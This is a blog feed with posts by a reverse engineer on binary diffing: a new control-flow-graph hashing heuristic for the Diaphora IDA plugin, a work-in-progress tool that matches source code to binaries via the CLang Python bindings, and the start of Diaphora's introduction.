Jekyll2020-10-26T18:27:34+01:00http://joxeankoret.com/feed.xmlJoxean KoretJoxean Koret's personal website about reverse engineering, vulnerability research, software development and even photography (sometimes).
Joxean KoretA new Control Flow Graph based heuristic for Diaphora2018-11-04T00:00:00+01:002018-11-04T00:00:00+01:00http://joxeankoret.com/blog/2018/11/04/diaphora-new-heuristic<p>Some weeks ago I decided to code a new heuristic based on one of the great ideas
that Huku, a researcher from Census Labs I met in some private event, proposes in
his paper <a href="https://census-labs.com/media/efficient-features-bindiff.pdf">Efficient Features for Function Matching between Binary Executables</a>.</p>
<h2 id="all-features-are-equal-but-some-features-are-more-equal-than-others">All features are equal, but some features are more equal than others</h2>
<p>In Huku’s paper, he proposes to extract features from the Control Flow Graphs (CFGs)
considering that each basic block (each node) can be special and classifies basic
blocks in 7 categories: normal, entry points, exit points, traps, self-loops,
loop heads and loop tails. In the same way, he classifies 4 different kinds of
edges: basis, forward, back edges and cross-links. There are various other good
looking ideas in that paper like, for example, the instructions histograms,
which classifies instructions in 4 categories based on their functionality
(arithmetic, logic, data transfer, redirection), but I haven’t implemented
anything based on the other ideas, for now.</p>
<h2 id="the-кока-algorithm">The КОКА algorithm</h2>
<p>In the case of the algorithm I have developed (КОКА, from Koret-Karamitas) and
based on the idea of “different basic blocks and edges are different interesting
pieces of information”, I have created a new heuristic for Diaphora that gets
features at function, basic block, edge and instruction level, assigns a
different prime value to each different feature and then generates a hash by
just mutiplying all the values (a small-primes-product, SPP). My algorithm
extracts the following features:</p>
<ul>
<li>For each basic block in each function, multiply a prime value assigned to
each different type of basic block (in the Huku’s case he considers 7
categories, in my case I only consider 3 categories: entry/exit points and
“normal” nodes).</li>
<li>For each edge in each function, multiply a prime value assigned to each
different type of edge. In my case I only consider, for now, 2 different types
of edges; Huku considers 4.</li>
<li>For each instruction, multiply a prime value assigned to each instruction
that is considered. In my case I only consider a reduced number of types of
instructions: in-calls, out-calls and data references.</li>
<li>At function level, again, multiply a prime value assigned to each feature I
consider. In my case I consider the number of loops, the number of strongly
connected components, if the function returns or not, if it’s a library
function and if it’s a thunk function or not.</li>
</ul>
<p>After all these four steps, the final generated ‘hash’ is a large number result
of the multiplication of the various prime numbers assigned to features of the
function. If you’re curious about why I decided not to add the various
different basic block and edge types that Huku mentions in his paper, it is
because, during my (very basic) testing I noticed that some features (like loop
heads/tails) were causing some mismatches for functions that are the same when
comparing binaries compiled for different architectures. Also, because I didn’t
want to copy the algorithm but, rather, based on his ideas create my own one.</p>
<h2 id="results-of-the-fuzzy-graph-hash">Results of the fuzzy graph hash</h2>
<p>The algorithm was made with the idea of making it somehow ‘fuzzy’ but not too
fuzzy or, otherwise, it would cause too many false positives. Let’s run the
script calculating the hash against the ‘ls’ binary from Ubuntu 16.04 x86_64
(with SHA1 hash b79f70b18538de0199e6829e06b547e079df8842).
IDA 7.2 discovered 416 functions during its initial analysis. Running the
script against that binary it will print out the hash for each function in the
database and, at the end, show the different unique hashes it discovered. In
this example, it says it discovered 141 unique hashes. It means that for this
database, the hash identifies unequivocally 141 functions out of 416, that’s
the 33.89% of the functions for just one single heuristic. Let’s see now some
multi-matches; that’s it, hashes that match multiple functions… For example,
given the hash 39278199524711331437958782332054597998538807300237778665425000000
it matches the functions at addresses 0x00407b40 and 0x00407cd0. If we take a
look to their control flow graphs we will see that they are identical:</p>
<p><a href="/assets/img/diaphora-graph-hash-2-matches-same-graph.png"><img width="100%" src="/assets/img/diaphora-graph-hash-2-matches-same-graph.png" alt="Two different functions with the same CFG" /></a></p>
<p>As we can see, it’s pretty much the same function. The only difference is that
one calls <code class="language-plaintext highlighter-rouge">strcmp()</code> and the other calls a wrapper for <code class="language-plaintext highlighter-rouge">strcoll()</code>. The
hash I chosen is somehow ‘big’, let’s try now with a smaller hash like for
example 8031387939300; it will match the functions at 0x00405120, 0x00405170,
0x0040f190, 0x0040f3c0 and 0x00413b9c. If we take a look to them we will see
small functions like the following ones:</p>
<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">B9C</span> <span class="nv">sub_413B9C</span> <span class="nv">proc</span> <span class="nv">near</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">B9C</span> <span class="c1">; __unwind {</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">B9C</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nv">offset</span> <span class="nv">unk_61F360</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA1</span> <span class="nv">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="nv">offset</span> <span class="nv">_localtime_r</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA6</span> <span class="nv">jmp</span> <span class="nv">sub_413723</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA6</span> <span class="c1">; } // starts at 413B9C</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA6</span> <span class="nv">sub_413B9C</span> <span class="nv">endp</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><span class="nl">.text:</span><span class="err">0000000000405120</span> <span class="nf">sub_405120</span> <span class="nv">proc</span> <span class="nv">near</span>
<span class="nl">.text:</span><span class="err">0000000000405120</span> <span class="c1">; __unwind {</span>
<span class="nl">.text:</span><span class="err">0000000000405120</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span>
<span class="nl">.text:</span><span class="err">0000000000405123</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">]</span>
<span class="nl">.text:</span><span class="err">0000000000405126</span> <span class="nf">jmp</span> <span class="nv">_strcmp</span>
<span class="nl">.text:</span><span class="err">0000000000405126</span> <span class="c1">; } // starts at 405120</span>
<span class="nl">.text:</span><span class="err">0000000000405126</span> <span class="nf">sub_405120</span> <span class="nv">endp</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C0</span> <span class="nv">sub_40F3C0</span> <span class="nv">proc</span> <span class="nv">near</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C0</span> <span class="c1">; __unwind {</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C0</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nv">offset</span> <span class="nv">unk_61E5A0</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C5</span> <span class="nv">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mh">0FFFFFFFFFFFFFFFFh</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3CC</span> <span class="nv">jmp</span> <span class="nv">sub_40EAA0</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3CC</span> <span class="c1">; } // starts at 40F3C0</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3CC</span> <span class="nv">sub_40F3C0</span> <span class="nv">endp</span></code></pre></figure>
<p>As we can see, all the functions are pretty similar. There are differences in
what they do, of course, but at the number of cross references, data references,
basic blocks, edges, calls, etc… they are equal and it is this algorithm’s
sole purpose.</p>
<h2 id="the-new-heuristic">The new heuristic</h2>
<p>As previously mentioned, I’ve added a new heuristic to Diaphora based on the
output of this algorithm. As with MD-Indices, only hashes that are ‘rare enough’
are considered. It turns out that the reliability of the matches discovered by
this hash is very high and, as so, the results of the heuristic ‘Same rare КОКА
Hash’ are always assigned to either the “Best” or “Partial” tabs but, in case of
partial matches, with a high similarity ratio, usually something higher than
0.98 which is very-very high. But, most of the time, as shown in the picture
bellow, such matches are always ‘perfect’ ones:</p>
<p><a href="/assets/img/same-rare-spp-graph-hash-chooser-best.png"><img src="/assets/img/same-rare-spp-graph-hash-chooser-best.png" width="100%" alt="A set of 'Best matches' found using the 'Same rare КОКА Hash'" /></a></p>
<h2 id="the-independent-library">The independent library</h2>
<p>While this heuristic has been created with the idea of using it in Diaphora, it
can be used half-independently. You just need to put in the same folder the
scripts <code class="language-plaintext highlighter-rouge">graph_hashes.py</code> and <code class="language-plaintext highlighter-rouge">tarjan_sort.py</code> from Diaphora or,
alternatively, copy the directories <code class="language-plaintext highlighter-rouge">jkutils</code> and <code class="language-plaintext highlighter-rouge">others</code> to some
directory where your script will reside, and in any of these 2 ways you can use
independently this algorithm for your own tasks by writing an IDA Python script
similar to the following one:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">idaapi</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c1"># Remove the "jkutils." part if you just copied graph_hashes.py & tarjan_sort.py
</span><span class="kn">from</span> <span class="nn">jkutils.graph_hashes</span> <span class="kn">import</span> <span class="n">CKoretKaramitasHash</span>
<span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">Functions</span><span class="p">():</span>
<span class="n">hasher</span> <span class="o">=</span> <span class="n">CKoretKaramitasHash</span><span class="p">()</span>
<span class="n">final_hash</span> <span class="o">=</span> <span class="n">hasher</span><span class="p">.</span><span class="n">calculate</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"0x%08x: %s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">final_hash</span><span class="p">)))</span></code></pre></figure>
<h2 id="porting-the-algorithm-and-final-remarks">Porting the algorithm and final remarks.</h2>
<p>The code for this CFGs hashing algorithm has been pushed to the
<a href="https://github.com/joxeankoret/diaphora">Diaphora’s GitHub repository</a> and is
now available <a href="https://github.com/joxeankoret/diaphora/blob/master/jkutils/graph_hashes.py">here</a>.</p>
<p>The algorithm is rather easy to port to other reverse engineering frameworks
like <a href="https://binary.ninja/">Binary Ninja</a> or <a href="http://rada.re">Radare2</a> but, for now, it’s left as an exercise for
the reader. It would be very cool to have it working in Radare2 to, for
example, cluster and index malware with only open source tools. Perhaps it
could be a great new feature for <a href="https://github.com/joxeankoret/cosa-nostra">Cosa Nostra</a> and <a href="https://github.com/joxeankoret/maltindex">MalTindex</a>.</p>
<p>And… that’s all! I hope you like both this blog post and the new heuristic,
and don’t forget to check Huku’s paper!</p>Joxean KoretSome weeks ago I decided to code a new heuristic based on one of the great ideas that Huku, a researcher from Census Labs I met in some private event, proposes in his paper Efficient Features for Function Matching between Binary Executables.Histories of comparing binaries with source codes2018-08-12T10:37:01+02:002018-08-12T10:37:01+02:00http://joxeankoret.com/blog/2018/08/12/histories-of-comparing-binaries-with-source-codes<p>Hi all!</p>
<p>Some months ago I started designing and writing a tool to do a <em>simple</em> thing: directly diff source codes against binaries. In the next paragraphs I will explain some of the problems I have discovered, how I managed to solve others, how I believe it’s almost impossible to fix some others as well as explain what is the current status of this tool.<!--more--></p>
<p><strong>Introduction: How I had the idea</strong></p>
<p>(if you’re not interested in why I decided to write such a tool you can skip to the next section. If you’re just interested in having early access to the tool or knowing when is it going to be released, skip to the “ETA WEN?” section).</p>
<p>I had this idea various years ago when I had to reverse engineer a software that I will not name: diff source codes against binaries without having to build the source code, open the binaries in IDA and diffing both databases. When I had the idea, as I mentioned, I was reverse engineering some software, after unpacking and deobfuscating it + manually fixing some things here and there, I had an IDA database that I could work with. However, I had thousands of functions to analyse. Searching in the internet I noticed that there was a leak of partial source code from more than 10 years ago. So, I downloaded that leak, unpacked the archive and tried to compile it so I could diff my target’s IDA database against the binary or binaries from the old leak. It was almost impossible to compile it. Surprise. The reasons were various:</p>
<ol>
<li>The compilers supported for building that code base dated from more than 10 years ago.</li>
<li>There were various headers and libraries that were required for compilation or linking phases that I didn’t had, as the leak was partial.</li>
<li>Even if I could somehow compile portions of the old source code, I would only be able to import symbols from those files that I managed to compile.
<ol>
<li>Naturally, those source code files were the less complex and less important ones.</li>
</ol>
</li>
</ol>
<p>What I did in that case was to match some functions from the source files I managed to build to the functions in my target’s binary and, then, manually look for code references to rename things manually. And at this point I said to myself: “This is stupid, I should automate it somehow”. So, I wrote down the idea in my never-ending TODO list and decided that, some day, I would start working on it. It took me a few years to start this project.</p>
<p><strong>Diffing source codes to binaries</strong></p>
<p>When I started this project I already had an idea about how to write “diffing tools”, after writing and maintaining for various years <a href="http://diaphora.re/">Diaphora</a>, but comparing binaries against binaries or sources against sources is kind of easy while comparing binaries against source codes, is not. In any case, I had the basic idea of how I should do this:</p>
<ol>
<li>Parse source codes and extract artifacts from source codes.</li>
<li>Analyse IDA databases and extract from binaries the very same artifacts extracted from source codes.</li>
<li>Develop heuristics to match functions in source codes to functions in binaries using the extracted artifacts.</li>
<li>Finally, let the reverse engineer import matched functions, prototypes, enumerations and structures from the source codes to the binary.</li>
</ol>
<p>And, basically, this is all this project does. But each step, especially dealing with source codes, has its own problems that are far from being trivial ones.</p>
<p><strong>Parsing source codes</strong></p>
<p>Parsing source codes is far from being an already solved problem. Yes, of course, parsers for many languages out there do exist. Yes, of course, one can write a parser for some programming languages easily. But is not the same supporting one dialect of one programming language than having to support all dialects of the programming languages that you want to support. For example: let’s say that you want to support C and C++ source codes. You will have to support at the very least the 3 major compilers supported features: the GCC, CLang and Microsoft Visual C++ supported syntax, which happens to be incompatible in some cases, especially when talking about Microsoft Visual C++. So, what can you do? You have 2 or 3 choices:</p>
<ol>
<li>Write a full parser (and either fail at doing so or never be done and hate yourself for years to come).</li>
<li>Write a fuzzy parser (this is what the tool written by Fabian Yamaguchi “<a href="http://mlsec.org/joern/">Joern”</a> does). Has most of the same problems as before but with less rules as your parser doesn’t need to be a full blown parser.</li>
<li>Use an existing compiler front-end instead of reinventing the wheel.</li>
</ol>
<p>And this is what I did: use an existing compiler front-end. There aren’t too many options to choose from when talking about C and C++ source codes:</p>
<ol>
<li>Use <a href="https://github.com/eliben/pycparser">PyCParser</a> or some similarly rather basic parser. It might work for a quick prototype, but do not plan to use it ever for a real tool.</li>
<li>Use <a href="https://gccxml.github.io/HTML/Index.html">GCCXML</a> or something around GCC that you code yourself (don’t do that unless you like suffering).</li>
<li>Use the CLang bindings. There are APIs and bindings for C, C++ and Python. It will support whatever CLang supports and it will not support whatever CLang doesn’t support.</li>
<li>If you have a rich uncle in America or if you are in a University, use the Edison Design Group C/C++ front-end. The EDG C/C++ front-end is the best of the best front-end with no doubt. They support almost any compiler’s dialect, specific versions and even specific version bugs! Actually, many commercial compilers are just forks of EDG, like AIX xlC/C++ compilers or the Intel C++ compiler.</li>
</ol>
<p>My first option was to try to get an open source license for the EDG front-end but after exchanging some e-mails nothing materialized. So, my only other viable choice was to use CLang. I decided to use the Python bindings so I could reuse code from Diaphora. Perhaps it wasn’t a great choice and I should have used the C/C++ APIs… but it doesn’t really matter.</p>
<p><strong>Using the CLang Python Bindings</strong></p>
<p>The CLang Python bindings are great for parsing C, C++ and Objective-C source codes. And what is even better: you don’t need to have full compilable source codes. The bindings will “swallow” almost anything they can understand. Especially when talking about C source codes, it will parse many source files and functions even when headers, for example, cannot be found. Of course, some functions will have no artifacts as they failed to compile/parse, but at least it doesn’t refuse to continue compiling/parsing other functions in the same source file, which lets me getting artifacts from partial source codes. Just what I want.</p>
<p>The following is an example of partial source codes that cannot be completely parsed (from the testing suite of the tool I’m writing) that shows how the CLang’s Python bindings deal with them:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <stdio.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">g_something</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">__attribute__</span><span class="p">((</span><span class="n">always_inline</span><span class="p">))</span> <span class="n">foo</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// This function will fail to compile as the compiler doesn't know what</span>
<span class="c1">// is invalid_type_t</span>
<span class="n">invalid_type_t</span> <span class="nf">failing_func</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"I failez!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="kr">__inline</span> <span class="nf">set_something</span><span class="p">(</span><span class="kt">int</span> <span class="n">kk</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">copy</span> <span class="o">=</span> <span class="n">kk</span><span class="p">;</span>
<span class="n">g_something</span> <span class="o">=</span> <span class="n">copy</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we try to compile this file with CLang or any other compiler it will fail, naturally. But if we “parse” it with the CLang Python bindings, it will not completely fail. I will use the <a href="https://pastebin.com/PaUcpqZM">following Python script</a> to compile the testing C file and printing out the Abstract Syntax Tree (AST) that the bindings use:</p>
<pre>
$ ./dump_ast.py test.c ""
test.c:18,1: <strong>error</strong>: unknown type name 'invalid_type_t'
CursorKind.TRANSLATION_UNIT 'test.c' '#'
(...)
CursorKind.FUNCTION_DECL INLINED? False '<strong>int failing_func</strong>()' 'invalid_type_t'
CursorKind.COMPOUND_STMT '' '{'
CursorKind.CALL_EXPR 'printf' 'printf'
CursorKind.UNEXPOSED_EXPR 'printf' 'printf'
CursorKind.DECL_REF_EXPR 'printf' 'printf'
CursorKind.UNEXPOSED_EXPR '' '"I failez!\\n"'
CursorKind.UNEXPOSED_EXPR '' '"I failez!\\n"'
CursorKind.STRING_LITERAL '"I failez!\\n"' '"I failez!\\n"'
(...)
</pre>
<p>As we can see, the bindings continued parsing the function even when the type invalid_type_t cannot be resolved and we can still extract artifacts from this function, like the function called (printf) or the string constant used (“I failez\n”). This is all I want for this project: an AST I can use to extract ‘things’ even if the source code cannot be compiled to object file because there are missing dependencies.</p>
<p>And, now, we can move to the next step…</p>
<p><strong>Extracting artifacts</strong></p>
<p>After being able to deal with source codes (using the CLang Python bindings) and with binaries (using the IDA Python APIs) the next step is to extract artifacts from both binaries and source codes so we can later on use these artifacts for matching a function F in the source code to a function F’ in the binary. But, what artifacts can we extract? One of my first ideas was to extract ASTs from both source codes and binaries (by using the Hex-Rays decompiler) to perform a fuzzy comparison of both. It turned out to be a stupid idea. Why? I think it needs a whole new section to explain it…</p>
<p><strong>Comparing ASTs from binaries and source codes</strong></p>
<p>So, why it was a bad idea? Because the AST from a human’s written function and the AST generated by an optimizing decompiler from optimized compiler generated code are totally different. I will explain it in more detail: when a source file gets compiled the compiler front-end takes the source code and generates an AST, then the compiler translates the function to some sort of Intermediate Representation (IR), then it performs optimizations over the IR and, then, the compiler back-end generates the final code based on the optimized IR. Then, when we use the decompiler, it takes the output of the compiler, which is already optimized, performs various analysis of the function and its basic blocks, generates an IR based on the compiler generated assembly code, performs optimizations over the IR and, finally, the decompiler outputs pseudo-code. Whatever the programmer wrote after these 2 non information preserving steps is mostly lost at the AST level. It can be easily seen with a picture:</p>
<p><a href="/wp-content/uploads/2018/08/src_ast_to_bin_ast-1.png" rel="attachment wp-att-51949">
<img src="/wp-content/uploads/2018/08/src_ast_to_bin_ast-1.png" alt="To the left, the source of a C function. To the right, the decompiler generated pseudo-code." /></a></p>
<p class="wp-caption-text">
To the left, the source of a C function. To the right, the decompiler generated pseudo-code.
</p>
<p>This picture shows the source code of a buggy C function (resembling an <a href="https://www.securityfocus.com/archive/1/428183/30/0/threaded">old privilege escalation bug in X11</a>) and the generated pseudo-code. As we can see, the function geteuid is not called but rather its address is compared to zero. The compiler noticed it, it generated a warning or not, and finally, in the binary, the comparison was removed as the compiler knew before hand that the address of geteuid wasn’t ever zero. Then, the decompiler takes whatever the compiler generated, does its job, and generates a pseudo-code that, naturally, doesn’t reference the geteuid function, doesn’t include the printf(“Only root!\n”) call, etc…</p>
<p>This was just a trivial example of why a direct comparison of C code’s ASTs with pseudo-code’s ASTs is really a bad idea. So, when I realized I am stupid and that it wouldn’t work, I started thinking about other artifacts I could use for comparison.</p>
<p><strong>Finding the appropriate artifacts for comparison</strong></p>
<p>Believe it or not, it might very well be one of the hardest part of this project: what to extract to get a series of matches that I can trust. From my experiences in Diaphora, I decided to, perhaps, try to use again graphs related heuristics. As with the AST idea, it turned out to be yet another stupid idea (except for call graph related heuristics). Let’s say that, for example, we want to use the Control Flow Graphs (CFGs). As with ASTs extracted from human written code, CFGs generated from human written code are totally different to the CFGs we get after the compiler generates its output. It gets even worst when we consider that there can be various different optimization levels applied. As so, after a brief analysis of the data (and writing a quick CFG builder from ASTs that I had to drop), I decided that I couldn’t use pretty much any of the heuristics I use from Diaphora. Except the most rudimentary ones, like <span style="font-size: 1rem;">the number of conditionals, </span><span style="font-size: 1rem;">string and numeric constants, s</span><span style="font-size: 1rem;">witch cases or the </span><span style="font-size: 1rem;">number of loops. </span>These were the first “things” I started to extract for comparison. And it turned out that with these 4 easy to extract artifacts, I could have some initial matches. But what I think is more important: some initial matches <strong>with almost zero false positives</strong>!</p>
<p>The reasons behind why these artifacts are good for comparison are the following:</p>
<ul>
<li>A compiler might decide to apply constants folding, but it will not remove the constants, unless they only appear in a dead code path.</li>
<li>If a source code function contains a loop with a non impossible condition in a non dead code path the compiler will generate a loop in most cases (the compiler might unroll the loop if it’s possible, but it will not happen in 100% of the cases).</li>
<li>The number and values of a switch statement should be the same in both the binary and the source code if there aren’t impossible conditions, values or paths.</li>
<li>Usually, the number of conditionals for small to medium functions doesn’t change or it only slightly changes.</li>
</ul>
<p>And, when I had my first initial matches with almost no false positives, I started writing an IDA Python based GUI so I could graphically see the matches.</p>
<p><strong>Blind Visual Diffing</strong></p>
<p>The next funny problem I found was the following: once I have a match and I show it in some sort of IDA’s GUI list (in a chooser), how can I visually diff both functions? The answer is easy if we have a decompiler: we “just” diff the source codes with the generated pseudo-code and that’s it. Well, it doesn’t usually quite work as shown in the following picture:</p>
<p><a href="/wp-content/uploads/2018/08/diffing_src_to_pseudo.png" rel="attachment wp-att-51966"><img src="/wp-content/uploads/2018/08/diffing_src_to_pseudo.png" alt="Diffing source codes against pseudo-codes." /></a></p>
<p class="wp-caption-text">
Diffing source codes against pseudo-codes.
</p>
<p>But, even if it works (and it doesn’t in too many cases), how can we visually diff when the decompiler doesn’t support the processor architecture of our target? It doesn’t make any sense to show a diff of, say, PPC assembler and C source code. This is one of the various problems for which I have no solution. Perhaps one kind of a solution would be to display a list of what artifacts matched instead of source codes, but it will probably not be enough information as to rule out if the match is good or not.</p>
<p><strong>Comparing apples to oranges</strong></p>
<p>Another of the biggest problems I have had with this project is a common problem with diffing suites. Actually, I first experienced this problem with Diaphora. Once I have a match, how can I determine how reliable is it? It means writing a comparison function that takes as input a source code function’s extracted artifacts and a binary function’s extracted artifacts that outputs a ratio. It might sound easy but… how can I determine how close is a C function to a binary’s assembler function? In Diaphora, one of the ways for comparing 2 functions is to compare if their assembly or pseudo-code representation are similar. However, in this case I cannot do that for 2 reasons:</p>
<ol>
<li>I cannot directly compare assembler and source codes.</li>
<li>In most of the cases, the number of differences comparing source codes with pseudo-codes is huge even for a 100% reliable match (like in the previous picture).</li>
</ol>
<p>How I solved it? I haven’t. Or I just solved it partially: I assigned weights to each heuristic I have. However, I haven’t used any “scientific” approach to determine the weights. What I have used is manual analysis. Actually, this is another problem I have: how to automate the process of finding the proper weights for each heuristic. But this is a problem for another time…</p>
<p><strong>I heard you like problems…</strong></p>
<p>Another problem, another one I’m still dealing with, is how to properly import structures, enumerations and other pieces of interesting information from source codes to binaries. For example, let’s say that we have a good match and we want to import all relevant information from the source code to the binary. Now, consider the following good match:</p>
<p><a href="/wp-content/uploads/2018/08/busybox_do_sethostname_diff.png" rel="attachment wp-att-51986"><img src="/wp-content/uploads/2018/08/busybox_do_sethostname_diff.png" alt="A match between the source code and the binary Busybox function do_sethostname()." /></a></p>
<p class="wp-caption-text">
A match between the source code and the binary Busybox function do_sethostname().
</p>
<p>As we can see in the source code version, there is a variable of type parser_t and, naturally, we would like to import the parser_t struct’s definition to our IDA database. First of all, we don’t know where is it, we have to find it. So, what we do? We check the include files. First problem: the current version of the CLang bindings don’t let you get a list of files included. OK, then the solution is another: just get that information when parsing source code files from all the files included. It’s possible, but it means that for any and all source files we have to parse also all include files (even the standard ones) making the parsing process really slow. Let’s say that we manage to only do it once, somehow, and we found the definition of parser_t. Now, let’s say that the struct contains other structures: we have to find them. Once we resolved all of them, we have to import them in IDA. It means having to create a dependency tree for the structs, so if struct A uses struct B and struct B uses struct C, we need to import first struct C then struct B to finally import struct A. In any case, that’s is more a programming problem than a real reverse engineering problem.</p>
<p><strong>In-lined functions</strong></p>
<p>Yet another partial problem I’m dealing with: sometimes, functions are in-lined by compilers, sometimes humans hint the compiler to try to in-line the function whenever possible, but the compiler will decide if it will finally in-line the function or not. That means that some functions will be in-lined, thus, they will not appear in the binary as independent functions; other times, will be in-lined sometimes, thus, appearing inside other functions as well as independent functions, and we cannot rely on any of the compiler hints for in-lining functions (the inline, __inline, __forceinline, __attribute__((always_inline)), __please_inline, etc… and friends). It will cause some functions to match partially when they aren’t that same function. For example, consider the following functions:</p>
<p><a href="/wp-content/uploads/2018/08/start_with_cpu_inlined.png" rel="attachment wp-att-52004"><img width="100%" src="/wp-content/uploads/2018/08/start_with_cpu_inlined.png" alt="Some Busybox functions. One of them might get in-lined. Sometimes." /></a></p>
<p class="wp-caption-text">
Some Busybox functions. One of them might get in-lined. Sometimes.
</p>
<p>The function starts_with_cpu, sometimes, might get in-lined. As so, we might be wrongly matching this function with another one using the constants ‘c’, ‘p’ and ‘u’, and with one conditional, that has the function starts_with_cpu in-lined but doesn’t really do too much, thus, doesn’t make it complex enough as to make irrelevant these artifacts. Result: a false positive that is hard to detect automatically.</p>
<p>This is not a problem for which I have a solution that really works. For now. One of the solutions I considered was creating functions with various versions of in-line candidates inside. It caused the source code export times to explode and, in my tests, less than 1% of the functions with in-lines were matched. The code is there and the feature can be used, but it will not be enabled by default and, eventually, might get removed.</p>
<p>Another idea that I have to solve this problem, or at least a great percent of occurrences, is the following: <span style="font-size: 1rem;">Once I have a match that is not “100% perfect”, i.e., some rare and long enough string constants matched, but there are constants in the binary function that aren’t in the source function, try to search candidate in-line functions with these rare string constants and try to determine if combining both functions the comparison ratio is better. This way, I could find in-line functions at diffing time instead of at export time and only whenever I have a match that is relevant enough as to try to determine if it’s a function with one or more functions in-lined or not (because it will be a heavy operation).</span></p>
<p><strong>What about C++?</strong></p>
<p>I have no plans, at least not for now, to adapt it to support C++. Actually, I’m almost sure it cannot be used with non trivial C++. Why? A simple example: how many function calls are in the following C++ code?</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="k">class</span><span class="o">::</span><span class="n">member</span><span class="p">(</span><span class="kt">int</span> <span class="n">a</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CObj</span> <span class="n">obj</span><span class="p">;</span>
<span class="n">obj</span><span class="p">.</span><span class="n">do_stuff</span><span class="p">(</span><span class="n">a</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Answer: we cannot determine it with the given information. For example, the constructor of CObj might call one, two or ten functions (or none), and we don’t have that information here. The destructor of CObj can do the same. So, either we analyse any and all classes and create various versions of each function with and without in-lined constructors and destructors, or it will not find good matches, if it finds any at all. And this is not the only problem of analyzing non trivial C++ codes, as I would have to deal with templates, virtual functions, etc… I don’t hate myself that much.</p>
<p><strong>ETA WEN?</strong></p>
<p>I will publish the tool and my slides to the general public during the conference Hacktivity 2018, on October 12th. The tool will be open sourced, most likely under GPL, as always. However, if you want to have early access to it, you can drop me an e-mail or send me a direct message using twitter (my handle is @matalaz), and I will give you access to the private Github repository.</p>
<p>And, that’s all! I hope you liked that really long post.</p>joxeanHi all!Diaphora, a program diffing plugin for IDA Pro2015-03-13T09:42:33+01:002015-03-13T09:42:33+01:00http://joxeankoret.com/blog/2015/03/13/diaphora-a-program-diffing-plugin-for-ida-pro<p><strong>UPDATE: </strong>The plugin is now published in <a href="https://github.com/joxeankoret/diaphora">GitHub</a>.</p>
<p>Some weeks ago I started developing a binary diffing plugin for IDA Pro (in IDA Python) like Zynamics BinDiff, DarunGrim or Turbo Diff. The reasons to create one more (open source) plugin for such task are various, but the following are the main ones:</p>
<ol>
<li>We need an <strong>Open Source</strong> plugin/tool that is <strong>updated</strong>, <strong>maintained</strong> and <strong>easy to modify or adapt</strong>.</li>
<li>The plugin should do <strong>much more</strong> than what the current ones do. It must offer much more <strong>functionality</strong> than previously existing ones.</li>
<li>The plugin should be as <strong>deeply integrated in IDA</strong> as possible (because 99% of serious researchers use IDA as the main tool).</li>
<li>The plugin must <strong>not</strong> be <strong>subject</strong> <strong>to</strong> big corporation’s desires (i.e., <strong>Google</strong>).</li>
</ol>
